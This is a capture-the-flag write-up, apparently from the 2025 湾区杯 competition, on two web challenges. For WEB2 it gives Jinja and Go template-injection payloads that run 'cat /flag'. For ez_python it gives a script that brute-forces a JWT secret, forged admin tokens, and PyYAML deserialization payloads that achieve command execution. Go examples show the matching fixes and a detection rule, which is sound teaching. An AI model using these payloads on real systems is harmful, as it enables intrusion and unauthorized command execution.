2025 湾区杯 Writeup (partial)
WEB2
Challenge:
Trial and error
{{7*7}} (sent as %7B%7B7*7%7D%7D) comes back unchanged: {{7*7}}
%7B%25%20for%20c%20in%20''.__class__.__mro__[1].__subclasses__()%20%25%7D%7B%7Bloop.index0%7D%7D:%7B%7Bc.__name__%7D%7D%3Cbr%3E%7B%25%20endfor%20%25%7D
returns
{% for c in ''.__class__.__mro__[1].__subclasses__() %}{{loop.index0}}:{{c.__name__}}
{% endfor %}
7B%7B''.__class__.__mro__[1].__subclasses__()[40]('/bin/cat%20/flag',%20shell=True,%20stdout=-1).communicate()[0]%7D%7D
returns
7B{''.__class__.__mro__[1].__subclasses__()[40]('/bin/cat /flag', shell=True, stdout=-1).communicate()[0]}}
POST /api?template=../../../../../../../../../../etc/passwd
returns ../../../../../../../../../../etc/passwd
GET /api?template=%22%3E%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3Dalert%28111%29%3B%3E+ H
returns '>
dirsearch with the 40k-entry wordlist found no directories. Probing through request headers as well:
GET /api?template=%22%3E%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3Dalert%28111%29%3B%3E+ HTTP/1.1
Host: web-5d56972681.challenge.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
X-Template: {{7*7}}
X-View-File: /flag
Referer: http://web-5d56972681.challenge./
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 08 Sep 2025 06:04:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 37
Connection: keep-alive
Server: TinyFat/0.99.75
X-Content-Type-Options: nosniff
'>
GET /api?template=file:///flag HTTP/1.1
returns file:///flag
Now trying Go template injection. %7b%7b%20%2e%45%72%72%6f%72%20%7d%7d decodes to {{ .Error }}; the field names probed were:
{{ .Error }}
{{ .Name }}
{{ .Title }}
{{ .Content }}
{{ .Template }}
Sending {{.}} (%7B%7B.%7D%7D) returns the data map:
map[B64Decode:0x6ee380 exec:0x6ee120]
POST /api?template=%7b%7b%20%63%61%6c%6c%20%28%69%6e%64%65%78%20%2e%20%22%65%78%65%63%22%29%20%22%63%61%74%20%2f%66%6c%61%67%22%20%7d%7d%0a
returns the payload unchanged: {{ call (index . "exec") "cat /flag" }}
%7B%7Bprintf%20%22%25T%22%20%28index%20.%20%22exec%22%29%7D%7D
returns func(string) string
%7B%7B%24out%2C%20%24_err%20%3a%3d%20call%20%28index%20.%20%22exec%22%29%20%22cat%20%2Fflag%22%7D%7D%7B%7B%24out%7D%7D
returns the payload unchanged: {{$out, $_err := call (index . "exec") "cat /flag"}}{{$out}}
%7B%7Bcall%20%28index%20.%20%22B64Decode%22%29%20%22Y2F0IC9mbGFn%22%7D%7D
returns cat /flag
{{ call (index . "exec") "cat /flag" }}
returns {{ call (index . "exec") "cat /flag" }}
Confirmed: this is Go template injection.
The quotes get filtered, so switch to the base64 chain:
{{ call (index . "exec") (call (index . "B64Decode") "Y2F0IC9mbGFn") }}
URL:
/api?template=%7B%7Bcall%20%28index%20.%20%22exec%22%29%20%28call%20%28index%20.%20%22B64Decode%22%29%20%22Y2F0IC9mbGFn%22%29%7D%7D
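The root cause in WEB2 is that the template parameter is parsed as template source and executed against a data map that carries helper functions, which is why {{.}} dumps map[B64Decode exec] and printf "%T" reveals their signatures. The Go program below is an added example, not the challenge's code: it puts the vulnerable pattern next to the fix (a fixed template compiled once, request input passed only as data) and a probe-echo check that tells the two apart. The data map shape and the benign upper helper are assumptions standing in for the challenge's exec.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
	"text/template"
)

// pageData is the object handed to the template. Its shape is an assumption:
// ordinary fields next to a helper func, mirroring the map[B64Decode exec]
// that {{.}} revealed in the challenge, but with a harmless helper instead of exec.
func pageData() map[string]interface{} {
	return map[string]interface{}{
		"Title": "hello",
		"upper": strings.ToUpper,
	}
}

// renderUnsafe reproduces the vulnerable pattern: the request parameter becomes
// the template *source*, so every {{...}} action in it executes against pageData().
func renderUnsafe(userInput string) (string, error) {
	t, err := template.New("page").Parse(userInput)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, pageData()); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// fixedTmpl is compiled once from a constant; request input only ever enters
// through the Input field, where it is data, not code.
var fixedTmpl = template.Must(template.New("page").Parse("{{.Title}}: {{.Input}}"))

// renderSafe is the hardened form of renderUnsafe.
func renderSafe(userInput string) (string, error) {
	var buf bytes.Buffer
	data := map[string]interface{}{"Title": "hello", "Input": userInput}
	if err := fixedTmpl.Execute(&buf, data); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// isEchoedVerbatim is the check a regression test or canary can run: a probe
// that comes back unchanged was treated as data; one that comes back altered
// (or errors out) was evaluated as template code.
func isEchoedVerbatim(render func(string) (string, error), probe string) bool {
	out, err := render(probe)
	return err == nil && strings.Contains(out, probe)
}

func main() {
	for _, probe := range []string{"{{.Title}}", `{{printf "%T" .}}`, "{{.}}"} {
		fmt.Printf("probe %-20s unsafe echoes verbatim: %-5v  safe echoes verbatim: %v\n",
			probe, isEchoedVerbatim(renderUnsafe, probe), isEchoedVerbatim(renderSafe, probe))
	}
}
```

For HTML responses the same fixed-template pattern applies with html/template, which additionally escapes whatever lands in the Input field; the challenge served text/plain, so text/template is used here.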
ez_python
http://web-64090edb27.challenge./auth
returns
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6InVzZXIifQ.karYCKLm5IhtINWMSZkSe1nYvrhyg5TgsrEm7VR1D0E
Script to brute-force the two-character key suffix (digits + letters):
import jwt, requests, string

url = 'http://web-64090edb27.challenge./sandbox'
prefix = '@o70xO$0%#qR9#'
alphabet = string.ascii_letters + string.digits
payload = {'username': 'guest', 'role': 'admin'}

# Try every two-character suffix; a token the server accepts identifies the key.
for c1 in alphabet:
    for c2 in alphabet:
        key = prefix + c1 + c2
        token = jwt.encode(payload, key, algorithm='HS256')
        headers = {'Authorization': f'Bearer {token}'}
        files = {'codefile': ('x.yaml', 'a: 1\n'), 'mode': (None, 'yaml')}
        r = requests.post(url, headers=headers, files=files)
        if r.status_code != 500 and 'JWT Decode Failed' not in r.text and r.status_code == 200:
            print('[!] Valid key found:', key)
            print('[!] Response:', r.text)
            exit(0)
'''
[!] Valid key found: @o70xO$0%#qR9#m0
[!] Response: {"result":"{'a': 1}"}
'''

import jwt
key = '@o70xO$0%#qR9#m0'
payload = {'username': 'guest', 'role': 'admin'}
token = jwt.encode(payload, key, algorithm='HS256')
print(token)
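The JWT fell because the HS256 secret had only two unknown characters, so 62 * 62 = 3844 requests covered the whole key space. The Go code below is an added example (not the challenge app and not the author's script) of the verifier-side controls that make this class of bug a non-issue: a pinned algorithm, a constant-time signature comparison, and a minimum secret length enforced before any token is signed. demoSecret and MinSecretLen are assumptions made for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// MinSecretLen: HMAC-SHA256 keys should be at least the hash output size
// (32 bytes, RFC 7518 section 3.2). The challenge secret was 16 bytes with
// only two unknown characters, which is why a few thousand requests recovered it.
const MinSecretLen = 32

// demoSecret is a constructed value for this example; real secrets come from a CSPRNG.
const demoSecret = "constructed-demo-secret-of-at-least-32-bytes"

var b64 = base64.RawURLEncoding

// signHS256 builds header.payload.signature the same way PyJWT does for HS256,
// but refuses secrets short enough to brute-force.
func signHS256(claims map[string]interface{}, secret string) (string, error) {
	if len(secret) < MinSecretLen {
		return "", fmt.Errorf("secret is %d bytes, need at least %d", len(secret), MinSecretLen)
	}
	header := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	signingInput := header + "." + b64.EncodeToString(body)
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64.EncodeToString(mac.Sum(nil)), nil
}

// verifyHS256 checks the token before trusting any claim in it: the verifier pins
// the algorithm (it never lets the header pick one), compares the MAC in constant
// time, and only then decodes the payload.
func verifyHS256(token, secret string) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	headerJSON, err := b64.DecodeString(parts[0])
	if err != nil {
		return nil, err
	}
	var header struct {
		Alg string `json:"alg"`
	}
	if err := json.Unmarshal(headerJSON, &header); err != nil {
		return nil, err
	}
	if header.Alg != "HS256" {
		return nil, fmt.Errorf("unexpected alg %q", header.Alg)
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil {
		return nil, err
	}
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return nil, errors.New("signature mismatch")
	}
	payloadJSON, err := b64.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]interface{}
	if err := json.Unmarshal(payloadJSON, &claims); err != nil {
		return nil, err
	}
	return claims, nil
}

func main() {
	tok, err := signHS256(map[string]interface{}{"username": "guest", "role": "user"}, demoSecret)
	if err != nil {
		panic(err)
	}
	claims, err := verifyHS256(tok, demoSecret)
	fmt.Println("claims:", claims, "err:", err)
	// A 16-byte secret like the one recovered in the writeup is refused at signing time.
	_, err = signHS256(map[string]interface{}{"role": "admin"}, "@o70xO$0%#qR9#m0")
	fmt.Println("short secret:", err)
}
```

The length check is the control the challenge lacked; the alg pin and hmac.Equal are the two checks every HS256 verifier needs regardless of secret strength.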
Trial and error
ctf python command-execution solve: getattr(__import__('os'), '\x73\x79\x73\x74\x65\x6d')('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67') returns getattr(__import__('os'), '\x73\x79\x73\x74\x65\x6d')('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67') unchanged
__builtins__.__import__('os').popen('cat /flag').read()
__builtins__['__import__']('os').popen('cat /flag').read()
import importlib
os = importlib.import_module('os')
os.popen('cat /flag').read()
The keywords __builtins__, communicate, import and importlib all return
{"error":"forbidden keyword detected"}
so every one of them is banned.
!!python/object/apply:subprocess.check_output
- !!python/tuple
- 'cat'
- '/flag'
------WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name="mode"

yaml
returns {"error":"Command '('cat', '/flag')' returned non-zero exit status 1."}
!!python/object/apply:os.system
- 'cat /flag'
------WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name="mode"

yaml
returns {"result":"256"} (os.system gives back the wait status; 256 is exit code 1, so cat found no /flag)
!!python/object/apply:subprocess.check_output
- 'ls -al'
------WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name="mode"

yaml
returns {"error":"[Errno 2] No such file or directory: 'ls -al'"} (a single string is taken as the program name; the arguments need a tuple)
!!python/object/apply:subprocess.check_output
- !!python/tuple
- 'ls'
- '-al'
returns
{"result":"b'total 8\ndrwxr-xr-x 1 root root 20 Aug 6 10:06 .\ndrwxr-xr-x 1 root root 32 Sep 8 08:20 ..\n-rw-r--r-- 1 root root 5641 Aug 6 09:52 app.py\n'"}
POST /sandbox HTTP/1.1
Host: web-64090edb27.challenge.
Content-Length: 386
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBuu3FoilAXhPJELD
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6ImFkbWluIn0.h6QY-f521uX-fy_wmBSN2oVCGKChY9MATy75bfaZ6iU
Accept: */*
Origin: http://web-64090edb27.challenge.
Referer: http://web-64090edb27.challenge./
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

------WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name="codefile"; filename="1111111111111111111.txt"
Content-Type: text/plain

!!python/object/apply:subprocess.check_output
- !!python/tuple
- 'cat'
- '/f1111ag'
------WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name="mode"

yaml
------WebKitFormBoundaryBuu3FoilAXhPJELD--
returns
{"result":"b'flag{DpkwN8FY7C1G2GbHI1PKEmfIXvNDuxyc}\n'"}
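The sandbox's keyword denylist (__builtins__, import, importlib, communicate) stopped the Python payloads, but the yaml mode deserialized PyYAML !!python/ tags, which means yaml.load is being called with an unsafe Loader; the fix on the application side is yaml.safe_load, which rejects those tags outright. As an added example, not part of the writeup or of the challenge app, the Go program below reconstructs that denylist (an assumption drawn from the "forbidden keyword detected" responses above) and runs a !!python/ tag detector over constructed submissions, showing the check a WAF or log rule should carry alongside the keyword filter.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// forbidden is the keyword denylist the sandbox appears to use, reconstructed from
// the "forbidden keyword detected" responses in the writeup; an assumption, not app code.
var forbidden = []string{"__builtins__", "import", "importlib", "communicate"}

// denylistHit reports whether a submission trips the keyword filter.
func denylistHit(body string) bool {
	for _, kw := range forbidden {
		if strings.Contains(body, kw) {
			return true
		}
	}
	return false
}

// pythonTagRe matches PyYAML-specific tags such as !!python/object/apply:os.system.
// They only have meaning for yaml.load with an unsafe Loader; yaml.safe_load refuses
// them, so any occurrence in user-supplied YAML is worth an alert.
var pythonTagRe = regexp.MustCompile(`!!python/[A-Za-z_/]+(?::[A-Za-z0-9_.]+)?`)

// pythonTags returns every PyYAML tag found in the submission, in order.
func pythonTags(body string) []string {
	return pythonTagRe.FindAllString(body, -1)
}

// samples are constructed submissions for the demo, not captured traffic.
var samples = map[string]string{
	"python-code": "__import__('os').popen('id').read()",
	"plain-yaml":  "a: 1\n",
	"yaml-tag":    "!!python/object/apply:subprocess.check_output\n- !!python/tuple\n- 'id'\n",
}

func main() {
	for name, body := range samples {
		fmt.Printf("%-12s denylist=%-5v python tags=%v\n", name, denylistHit(body), pythonTags(body))
	}
}
```

The yaml-tag sample passes the keyword filter untouched and is caught only by the tag check, which is the gap the writeup walked through; the tag check is a detection aid, and the loader change is the actual fix.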